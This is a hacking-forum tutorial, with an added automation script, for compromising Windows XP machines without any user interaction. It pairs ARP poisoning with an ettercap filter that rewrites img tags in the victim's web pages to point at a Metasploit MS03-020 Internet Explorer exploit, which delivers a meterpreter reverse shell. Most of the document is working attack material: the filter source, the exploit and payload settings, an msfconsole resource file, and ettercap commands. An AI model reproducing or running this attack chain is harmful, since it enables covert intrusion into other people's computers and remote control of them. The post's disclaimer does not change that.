Hey again guys

Here we go again!! In this tut I will try to explain how I used Metasploit to gain access to a Windows XP SP2 box using ettercap filters. One reason somebody might use this route is that there is no interaction with the victim.

Once again, I hold no responsibility for what people do with this information. DO NOT email me, PM me or post here asking any member of this forum how to use this attack against a real victim!

Now let's begin.

First let's fire up Metasploit; we will use the nice and easy msfweb for this tut. Go to BackTrack >> Penetration >> Metasploit framework3 >> msfweb

Now open a web browser and go to:

http://127.0.0.1:55555

You should see Metasploit's web interface. Do a search in Exploits for "internet". For this tut I'm going to use the MS03-020 Internet Explorer Object Type exploit (ms03_020_ie_objecttype); you can use this one or try others. Select the Internet Explorer target and then choose a payload. That part is up to you, but for the example I will use the windows/meterpreter/reverse_tcp payload. Now let's set up the exploit: for SRVHOST enter your own IP (the victim's browser has to be able to reach it), and the rest depends on the payload you chose. For the example payload set LHOST to your IP as well, then hit Exploit.

Next you should get a new screen containing:
Code:
*Started reverse handler 
*Using URL: http://192.168.1.64:8080/qp7QmDBnn8q 
*Server started. 
*Exploit running as background job.
*msf exploit(ms03_020_ie_objecttype) >
Open kwrite and paste the URL (the one on your screen, not the one in this post); that URL is what the filter below will inject into the victim's pages. Let's move on....

Now let's set up our ettercap filter. You can make your own or use mine below. In my filter I have chosen to attach my URL to an "img src=" tag, because you can be pretty sure that nearly every web page the victim views contains one. You can play with different filters and so on. Two things to keep in mind: the filter only sees plain HTTP on port 80 (HTTPS pages pass through untouched), and the first block of the filter mangles the Accept-Encoding request header so the server sends the page uncompressed, otherwise the string match on the response never fires. Also, an img tag only makes the browser fetch the URL as an image; an exploit page that has to be parsed as HTML must be pulled in as a frame instead, so if you see the filter's "Check Metasploit" message but never get a session, swap the injected tag for an iframe.

First let's set up a tmp dir to store our stuff, lol:

Code:
mkdir metafilter
cd metafilter
Now cut and paste my filter into kwrite:

Code:
############################################################################
#                                                                          #
#  Metasploit -- metasploit.filter -- filter source file                   #
#                                                                          #
#  By DR_Gr33n. based on code from Irongeek                                # 
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is the same length as the original,
          # so the request keeps its length; the server then answers
          # uncompressed and the replace() below can see the tag
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   # put your msfweb URL between the escaped quotes, e.g.
   # replace("img src=", "img src=\"http://192.168.1.64:8080/qp7QmDBnn8q\" ");
   # the page's own src= stays behind as a second attribute on the same
   # tag, which browsers ignore in favour of the first one
   replace("img src=", "img src=\"paste your url here!!!\" ");
   replace("IMG SRC=", "IMG SRC=\"paste your url here!!!\" ");
   msg("Check Metasploit.\n");
}
Save it as metafilter.filter in the metafilter dir and close kwrite. Now let's build our filter:

Code:
etterfilter metafilter.filter -o metafilter.ef
Now we can start our attack.

Whoops, I missed fragrouter...

Code:
fragrouter -B1
Start ettercap.

Select unified sniffing:

Sniff >> Unified sniffing, and select your network adapter.

Now let's scan for our target and open the host list:

Hosts >> Scan for hosts
&
Hosts >> Host List

Select your victim's IP and hit the "Add to Target" button.

Let's load our filter:

Filters >> Load a filter

Browse to our folder /root/metafilter, select our filter "metafilter.ef" and hit OK.

EDIT: lol @ purehate, yes, I know this has been patched for a while. Let's not give the whole game away, lol; think of it as thicko protection.

Now let's start ARP poisoning the victim:

Mitm >> Arp poisoning, tick the "Sniff remote connections" box and hit OK.

Then Start >> Start sniffing.

Now watch the bottom pane of ettercap until you see "Check Metasploit", then go back to your Metasploit browser window.

You should now have a session if the hack has worked. If not, try another payload or exploit.
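The whole procedure above as one script, added here as an example and not DR_Gr33n's own code. It writes an msfconsole resource file that does the same as the msfweb clicks, writes the ettercap filter with the exploit URL already filled in, builds it with etterfilter and prints the text-mode ettercap command that replaces the GUI steps. It assumes (none of this is in the original post) that the exploit module's URIPATH option is set so the URL is known before Metasploit starts, that msfconsole, etterfilter and ettercap are on $PATH, and that LHOST, URIPATH, the victim IP and the gateway IP are passed on the command line. It sends no packets itself; the printed commands still have to be run by hand, as root.

```shell
#!/bin/sh
# Added example: scripted version of the msfweb + ettercap walkthrough.
# Assumptions: URIPATH is supported by the module (so the URL is fixed),
# default SRVPORT 8080, and the tools are on $PATH.

# Resource file with the same module, payload and options as in the post.
write_msf_rc() {   # write_msf_rc LHOST URIPATH OUTFILE
    cat > "$3" <<EOF
use exploit/windows/browser/ms03_020_ie_objecttype
set SRVHOST $1
set SRVPORT 8080
set URIPATH $2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $1
exploit -j
EOF
}

# The URL Metasploit will print for the settings above.
exploit_url() {   # exploit_url LHOST URIPATH
    printf 'http://%s:8080%s\n' "$1" "$2"
}

# The Accept-Encoding trick only keeps the request length intact when both
# strings are the same length, so check that before trusting a filter.
same_length() {   # same_length STRING1 STRING2
    [ ${#1} -eq ${#2} ]
}

# Filter with the URL in place. The backslash-escaped quotes are needed so the
# injected HTML reads  img src="http://..."  and the page's own src= becomes a
# second (ignored) attribute on the same tag.
write_filter() {   # write_filter URL OUTFILE
    same_length "Accept-Encoding" "Accept-Rubbish!" || return 1
    cat > "$2" <<EOF
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"$1\" ");
   replace("IMG SRC=", "IMG SRC=\"$1\" ");
   msg("Check Metasploit.\n");
}
EOF
}

# Compile the filter; skipped with a message on a box without etterfilter.
build_filter() {   # build_filter FILTERFILE EFFILE
    command -v etterfilter >/dev/null 2>&1 || { echo "etterfilter not found, compile $1 on the attack box" >&2; return 1; }
    etterfilter "$1" -o "$2"
}

# Text-mode equivalent of the GUI steps: unified sniffing on IFACE, load the
# filter, ARP poisoning with "sniff remote connections" (the :remote part),
# victim as target 1 and gateway as target 2. Older ettercap takes /IP/;
# 0.8.2 and later want /IP// because a slot for IPv6 was added.
ettercap_cmd() {   # ettercap_cmd IFACE EFFILE VICTIM GATEWAY
    printf 'ettercap -T -q -i %s -F %s -M arp:remote /%s/ /%s/\n' "$1" "$2" "$3" "$4"
}

run_attack() {   # run_attack LHOST URIPATH VICTIM GATEWAY [IFACE]
    lhost=$1; uripath=$2; victim=$3; gw=$4; iface=${5:-eth0}
    dir=${METAFILTER_DIR:-/root/metafilter}
    url=$(exploit_url "$lhost" "$uripath")
    mkdir -p "$dir"
    write_msf_rc "$lhost" "$uripath" "$dir/ms03_020.rc"
    write_filter "$url" "$dir/metafilter.filter"
    build_filter "$dir/metafilter.filter" "$dir/metafilter.ef" || true
    echo "1. msfconsole -r $dir/ms03_020.rc   (it should print 'Using URL: $url')"
    echo "2. $(ettercap_cmd "$iface" "$dir/metafilter.ef" "$victim" "$gw")"
    echo "3. wait for 'Check Metasploit.' in ettercap, then 'sessions -l' in msfconsole"
}

if [ $# -ge 4 ]; then
    run_attack "$@"
else
    echo "usage: $0 LHOST URIPATH VICTIM GATEWAY [IFACE]" >&2
fi
```

For example `sh metafilter.sh 192.168.1.64 /qp7QmDBnn8q 192.168.1.5 192.168.1.1 eth0` reproduces the URL shown in the msfweb output above. Note that the filter file is generated from scratch each run, so the URL never has to be pasted into it by hand.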

And you are done. Pat yourself on the back and have fun!!!

Hope I haven't made any mistakes; if I have, give me some abuse, lol.

PS: can a moderator edit the title? I added "dnsspoof" by mistake!